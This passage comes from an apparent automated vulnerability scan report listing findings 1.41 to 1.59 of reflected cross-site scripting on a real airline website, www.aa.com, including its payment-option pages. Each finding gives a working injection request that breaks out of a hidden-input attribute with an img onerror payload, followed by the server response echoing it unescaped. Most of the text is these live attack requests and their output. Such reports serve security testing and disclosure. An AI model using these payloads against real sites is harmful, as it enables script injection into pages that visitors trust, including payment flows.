Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:39:01 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 109726


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="cee2e"><img src=a onerror=alert(1)>a952f7fc535" value="1" />
...[SNIP]...

1.41. https://www.aa.com/i18n/reservations/paymentOptions/main.jsp [from parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/reservations/paymentOptions/main.jsp

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b58c1"><img%20src%3da%20onerror%3dalert(1)>185d4f1d9f6 was submitted in the from parameter. This input was echoed as b58c1"><img src=a onerror=alert(1)>185d4f1d9f6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /i18n/reservations/paymentOptions/main.jsp?from=Navb58c1"><img%20src%3da%20onerror%3dalert(1)>185d4f1d9f6 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:38:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 118383


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="from" value="Navb58c1"><img src=a onerror=alert(1)>185d4f1d9f6" />
...[SNIP]...

1.42. https://www.aa.com/i18n/reservations/paymentOptions/main.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/reservations/paymentOptions/main.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1dfbc"><img%20src%3da%20onerror%3dalert(1)>afd497f0c97 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1dfbc"><img src=a onerror=alert(1)>afd497f0c97 in the application's response.

This proof-of-concept shows that arbitrary JavaScript can be injected into the application's response. The leading "> in the payload closes the double-quoted attribute and the tag that contains it, and the <img> element that follows carries an onerror event handler, so the injected JavaScript runs as soon as the browser fails to load the non-existent image at src=a.

Request

GET /i18n/reservations/paymentOptions/main.jsp?1dfbc"><img%20src%3da%20onerror%3dalert(1)>afd497f0c97=1 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:38:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 118371


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="1dfbc"><img src=a onerror=alert(1)>afd497f0c97" value="1" />
...[SNIP]...

1.43. https://www.aa.com/i18n/reservations/paymentOptions/payPal.jsp [from parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/reservations/paymentOptions/payPal.jsp

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5969"><img%20src%3da%20onerror%3dalert(1)>45c1c93f316 was submitted in the from parameter. This input was echoed as a5969"><img src=a onerror=alert(1)>45c1c93f316 in the application's response.

This proof-of-concept shows that arbitrary JavaScript can be injected into the application's response. The leading "> in the payload closes the double-quoted attribute and the tag that contains it, and the <img> element that follows carries an onerror event handler, so the injected JavaScript runs as soon as the browser fails to load the non-existent image at src=a.

Request

GET /i18n/reservations/paymentOptions/payPal.jsp?from=Nava5969"><img%20src%3da%20onerror%3dalert(1)>45c1c93f316 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:39:00 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 108809


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="from" value="Nava5969"><img src=a onerror=alert(1)>45c1c93f316" />
...[SNIP]...

1.44. https://www.aa.com/i18n/reservations/paymentOptions/payPal.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/reservations/paymentOptions/payPal.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47ca9"><img%20src%3da%20onerror%3dalert(1)>29a51661631 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 47ca9"><img src=a onerror=alert(1)>29a51661631 in the application's response.

This proof-of-concept shows that arbitrary JavaScript can be injected into the application's response. The leading "> in the payload closes the double-quoted attribute and the tag that contains it, and the <img> element that follows carries an onerror event handler, so the injected JavaScript runs as soon as the browser fails to load the non-existent image at src=a.

Request

GET /i18n/reservations/paymentOptions/payPal.jsp?47ca9"><img%20src%3da%20onerror%3dalert(1)>29a51661631=1 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:39:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 108794


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="47ca9"><img src=a onerror=alert(1)>29a51661631" value="1" />
...[SNIP]...

1.45. https://www.aa.com/i18n/travelInformation/duringFlight/cabinComfort.jsp [anchorEvent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/travelInformation/duringFlight/cabinComfort.jsp

Issue detail

The value of the anchorEvent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1f3c"><img%20src%3da%20onerror%3dalert(1)>5c089a9e1a0 was submitted in the anchorEvent parameter. This input was echoed as d1f3c"><img src=a onerror=alert(1)>5c089a9e1a0 in the application's response.

This proof-of-concept shows that arbitrary JavaScript can be injected into the application's response. The leading "> in the payload closes the double-quoted attribute and the tag that contains it, and the <img> element that follows carries an onerror event handler, so the injected JavaScript runs as soon as the browser fails to load the non-existent image at src=a.

Request

GET /i18n/travelInformation/duringFlight/cabinComfort.jsp?anchorEvent=falsed1f3c"><img%20src%3da%20onerror%3dalert(1)>5c089a9e1a0&from=Nav HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:39:54 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 107747


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="anchorEvent" value="falsed1f3c"><img src=a onerror=alert(1)>5c089a9e1a0" />
...[SNIP]...

1.46. https://www.aa.com/i18n/travelInformation/duringFlight/cabinComfort.jsp [from parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/travelInformation/duringFlight/cabinComfort.jsp

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3f11"><img%20src%3da%20onerror%3dalert(1)>e02e0bf745e was submitted in the from parameter. This input was echoed as d3f11"><img src=a onerror=alert(1)>e02e0bf745e in the application's response.

This proof-of-concept shows that arbitrary JavaScript can be injected into the application's response. The leading "> in the payload closes the double-quoted attribute and the tag that contains it, and the <img> element that follows carries an onerror event handler, so the injected JavaScript runs as soon as the browser fails to load the non-existent image at src=a.

Request

GET /i18n/travelInformation/duringFlight/cabinComfort.jsp?anchorEvent=false&from=Navd3f11"><img%20src%3da%20onerror%3dalert(1)>e02e0bf745e HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:40:00 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 107753


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="from" value="Navd3f11"><img src=a onerror=alert(1)>e02e0bf745e" />
...[SNIP]...

1.47. https://www.aa.com/i18n/travelInformation/duringFlight/cabinComfort.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/travelInformation/duringFlight/cabinComfort.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c41f3"><img%20src%3da%20onerror%3dalert(1)>0ccbf2d3c1b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c41f3"><img src=a onerror=alert(1)>0ccbf2d3c1b in the application's response.

This proof-of-concept shows that arbitrary JavaScript can be injected into the application's response. The leading "> in the payload closes the double-quoted attribute and the tag that contains it, and the <img> element that follows carries an onerror event handler, so the injected JavaScript runs as soon as the browser fails to load the non-existent image at src=a.

Request

GET /i18n/travelInformation/duringFlight/cabinComfort.jsp?c41f3"><img%20src%3da%20onerror%3dalert(1)>0ccbf2d3c1b=1 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:39:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 107693


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="c41f3"><img src=a onerror=alert(1)>0ccbf2d3c1b" value="1" />
...[SNIP]...

1.48. https://www.aa.com/i18n/travelInformation/duringFlight/dining/dining.jsp [anchorEvent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/travelInformation/duringFlight/dining/dining.jsp

Issue detail

The value of the anchorEvent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba20c"><img%20src%3da%20onerror%3dalert(1)>1436892150e was submitted in the anchorEvent parameter. This input was echoed as ba20c"><img src=a onerror=alert(1)>1436892150e in the application's response.

This proof-of-concept shows that arbitrary JavaScript can be injected into the application's response. The leading "> in the payload closes the double-quoted attribute and the tag that contains it, and the <img> element that follows carries an onerror event handler, so the injected JavaScript runs as soon as the browser fails to load the non-existent image at src=a.

Request

GET /i18n/travelInformation/duringFlight/dining/dining.jsp?anchorEvent=falseba20c"><img%20src%3da%20onerror%3dalert(1)>1436892150e&from=Nav HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:40:04 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 114825


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="anchorEvent" value="falseba20c"><img src=a onerror=alert(1)>1436892150e" />
...[SNIP]...

1.49. https://www.aa.com/i18n/travelInformation/duringFlight/dining/dining.jsp [from parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/travelInformation/duringFlight/dining/dining.jsp

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da3eb"><img%20src%3da%20onerror%3dalert(1)>b18ca81b5c4 was submitted in the from parameter. This input was echoed as da3eb"><img src=a onerror=alert(1)>b18ca81b5c4 in the application's response.

This proof-of-concept shows that arbitrary JavaScript can be injected into the application's response. The leading "> in the payload closes the double-quoted attribute and the tag that contains it, and the <img> element that follows carries an onerror event handler, so the injected JavaScript runs as soon as the browser fails to load the non-existent image at src=a.

Request

GET /i18n/travelInformation/duringFlight/dining/dining.jsp?anchorEvent=false&from=Navda3eb"><img%20src%3da%20onerror%3dalert(1)>b18ca81b5c4 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:40:13 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 114825


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="from" value="Navda3eb"><img src=a onerror=alert(1)>b18ca81b5c4" />
...[SNIP]...

1.50. https://www.aa.com/i18n/travelInformation/duringFlight/dining/dining.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/travelInformation/duringFlight/dining/dining.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f567"><img%20src%3da%20onerror%3dalert(1)>ad7e1690ea9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2f567"><img src=a onerror=alert(1)>ad7e1690ea9 in the application's response.

This proof-of-concept shows that arbitrary JavaScript can be injected into the application's response. The leading "> in the payload closes the double-quoted attribute and the tag that contains it, and the <img> element that follows carries an onerror event handler, so the injected JavaScript runs as soon as the browser fails to load the non-existent image at src=a.

Request

GET /i18n/travelInformation/duringFlight/dining/dining.jsp?2f567"><img%20src%3da%20onerror%3dalert(1)>ad7e1690ea9=1 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:40:01 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 114762


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="2f567"><img src=a onerror=alert(1)>ad7e1690ea9" value="1" />
...[SNIP]...

1.51. https://www.aa.com/i18n/travelInformation/duringFlight/entertainment/main.jsp [anchorEvent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/travelInformation/duringFlight/entertainment/main.jsp

Issue detail

The value of the anchorEvent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb9de"><img%20src%3da%20onerror%3dalert(1)>a7510ce8c8b was submitted in the anchorEvent parameter. This input was echoed as bb9de"><img src=a onerror=alert(1)>a7510ce8c8b in the application's response.

This proof-of-concept shows that arbitrary JavaScript can be injected into the application's response. The leading "> in the payload closes the double-quoted attribute and the tag that contains it, and the <img> element that follows carries an onerror event handler, so the injected JavaScript runs as soon as the browser fails to load the non-existent image at src=a.

Request

GET /i18n/travelInformation/duringFlight/entertainment/main.jsp?anchorEvent=falsebb9de"><img%20src%3da%20onerror%3dalert(1)>a7510ce8c8b&from=Nav HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:40:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 115821


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="anchorEvent" value="falsebb9de"><img src=a onerror=alert(1)>a7510ce8c8b" />
...[SNIP]...

1.52. https://www.aa.com/i18n/travelInformation/duringFlight/entertainment/main.jsp [from parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/travelInformation/duringFlight/entertainment/main.jsp

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload baf65"><img%20src%3da%20onerror%3dalert(1)>7a937f825b8 was submitted in the from parameter. This input was echoed as baf65"><img src=a onerror=alert(1)>7a937f825b8 in the application's response.

This proof-of-concept shows that arbitrary JavaScript can be injected into the application's response. The leading "> in the payload closes the double-quoted attribute and the tag that contains it, and the <img> element that follows carries an onerror event handler, so the injected JavaScript runs as soon as the browser fails to load the non-existent image at src=a.

Request

GET /i18n/travelInformation/duringFlight/entertainment/main.jsp?anchorEvent=false&from=Navbaf65"><img%20src%3da%20onerror%3dalert(1)>7a937f825b8 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:40:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 115809


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="from" value="Navbaf65"><img src=a onerror=alert(1)>7a937f825b8" />
...[SNIP]...

1.53. https://www.aa.com/i18n/travelInformation/duringFlight/entertainment/main.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/travelInformation/duringFlight/entertainment/main.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a822a"><img%20src%3da%20onerror%3dalert(1)>8b28951e5a1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a822a"><img src=a onerror=alert(1)>8b28951e5a1 in the application's response.

This proof-of-concept shows that arbitrary JavaScript can be injected into the application's response. The leading "> in the payload closes the double-quoted attribute and the tag that contains it, and the <img> element that follows carries an onerror event handler, so the injected JavaScript runs as soon as the browser fails to load the non-existent image at src=a.

Request

GET /i18n/travelInformation/duringFlight/entertainment/main.jsp?a822a"><img%20src%3da%20onerror%3dalert(1)>8b28951e5a1=1 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:39:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 115758


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="a822a"><img src=a onerror=alert(1)>8b28951e5a1" value="1" />
...[SNIP]...

1.54. https://www.aa.com/i18n/travelInformation/duringFlight/onboardTechnology.jsp [anchorEvent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/travelInformation/duringFlight/onboardTechnology.jsp

Issue detail

The value of the anchorEvent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d61b"><img%20src%3da%20onerror%3dalert(1)>0acc542d09c was submitted in the anchorEvent parameter. This input was echoed as 4d61b"><img src=a onerror=alert(1)>0acc542d09c in the application's response.

This proof-of-concept shows that arbitrary JavaScript can be injected into the application's response. The leading "> in the payload closes the double-quoted attribute and the tag that contains it, and the <img> element that follows carries an onerror event handler, so the injected JavaScript runs as soon as the browser fails to load the non-existent image at src=a.

Request

GET /i18n/travelInformation/duringFlight/onboardTechnology.jsp?anchorEvent=false4d61b"><img%20src%3da%20onerror%3dalert(1)>0acc542d09c&from=Nav HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:39:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 114704


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="anchorEvent" value="false4d61b"><img src=a onerror=alert(1)>0acc542d09c" />
...[SNIP]...

1.55. https://www.aa.com/i18n/travelInformation/duringFlight/onboardTechnology.jsp [from parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/travelInformation/duringFlight/onboardTechnology.jsp

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca250"><img%20src%3da%20onerror%3dalert(1)>001bb0afa00 was submitted in the from parameter. This input was echoed as ca250"><img src=a onerror=alert(1)>001bb0afa00 in the application's response.

This proof-of-concept shows that arbitrary JavaScript can be injected into the application's response. The leading "> in the payload closes the double-quoted attribute and the tag that contains it, and the <img> element that follows carries an onerror event handler, so the injected JavaScript runs as soon as the browser fails to load the non-existent image at src=a.

Request

GET /i18n/travelInformation/duringFlight/onboardTechnology.jsp?anchorEvent=false&from=Navca250"><img%20src%3da%20onerror%3dalert(1)>001bb0afa00 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:40:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 114704


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="from" value="Navca250"><img src=a onerror=alert(1)>001bb0afa00" />
...[SNIP]...

1.56. https://www.aa.com/i18n/travelInformation/duringFlight/onboardTechnology.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/travelInformation/duringFlight/onboardTechnology.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 433f7"><img%20src%3da%20onerror%3dalert(1)>496f0c36f2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 433f7"><img src=a onerror=alert(1)>496f0c36f2 in the application's response.

This proof-of-concept shows that arbitrary JavaScript can be injected into the application's response. The leading "> in the payload closes the double-quoted attribute and the tag that contains it, and the <img> element that follows carries an onerror event handler, so the injected JavaScript runs as soon as the browser fails to load the non-existent image at src=a.

Request

GET /i18n/travelInformation/duringFlight/onboardTechnology.jsp?433f7"><img%20src%3da%20onerror%3dalert(1)>496f0c36f2=1 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:39:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 114640


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="433f7"><img src=a onerror=alert(1)>496f0c36f2" value="1" />
...[SNIP]...

1.57. https://www.aa.com/i18n/travelInformation/specialAssistance/childrenTraveling.jsp [anchorEvent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/travelInformation/specialAssistance/childrenTraveling.jsp

Issue detail

The value of the anchorEvent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5cc09"><img%20src%3da%20onerror%3dalert(1)>a65a16f66dd was submitted in the anchorEvent parameter. This input was echoed as 5cc09"><img src=a onerror=alert(1)>a65a16f66dd in the application's response.

This proof-of-concept shows that arbitrary JavaScript can be injected into the application's response. The leading "> in the payload closes the double-quoted attribute and the tag that contains it, and the <img> element that follows carries an onerror event handler, so the injected JavaScript runs as soon as the browser fails to load the non-existent image at src=a.

Request

GET /i18n/travelInformation/specialAssistance/childrenTraveling.jsp?anchorEvent=false5cc09"><img%20src%3da%20onerror%3dalert(1)>a65a16f66dd&from=Nav HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:39:47 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 142463


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="anchorEvent" value="false5cc09"><img src=a onerror=alert(1)>a65a16f66dd" />
...[SNIP]...

1.58. https://www.aa.com/i18n/travelInformation/specialAssistance/childrenTraveling.jsp [from parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/travelInformation/specialAssistance/childrenTraveling.jsp

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fb48"><img%20src%3da%20onerror%3dalert(1)>a4bb67d167e was submitted in the from parameter. This input was echoed as 4fb48"><img src=a onerror=alert(1)>a4bb67d167e in the application's response.

This proof-of-concept shows that arbitrary JavaScript can be injected into the application's response. The leading "> in the payload closes the double-quoted attribute and the tag that contains it, and the <img> element that follows carries an onerror event handler, so the injected JavaScript runs as soon as the browser fails to load the non-existent image at src=a.

Request

GET /i18n/travelInformation/specialAssistance/childrenTraveling.jsp?anchorEvent=false&from=Nav4fb48"><img%20src%3da%20onerror%3dalert(1)>a4bb67d167e HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:39:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 142454


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="from" value="Nav4fb48"><img src=a onerror=alert(1)>a4bb67d167e" />
...[SNIP]...

1.59. https://www.aa.com/i18n/travelInformation/specialAssistance/childrenTraveling.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/travelInformation/specialAssistance/childrenTraveling.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2464e"><img%20src%3da%20onerror%3dalert(1)>a096f60c964 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2464e"><img src=a onerror=alert(1)>a096f60c964 in the application's response.

This proof-of-concept shows that arbitrary JavaScript can be injected into the application's response. The leading "> in the payload closes the double-quoted attribute and the tag that contains it, and the <img> element that follows carries an onerror event handler, so the injected JavaScript runs as soon as the browser fails to load the non-existent image at src=a.

Request

GET /i18n/travelInformation/specialAssistance/childrenTraveling.jsp?2464e"><img%20src%3da%20onerror%3dalert(1)>a096f60c964=1 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:39:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 142400


                       <!-- Inserting TagLib here -->


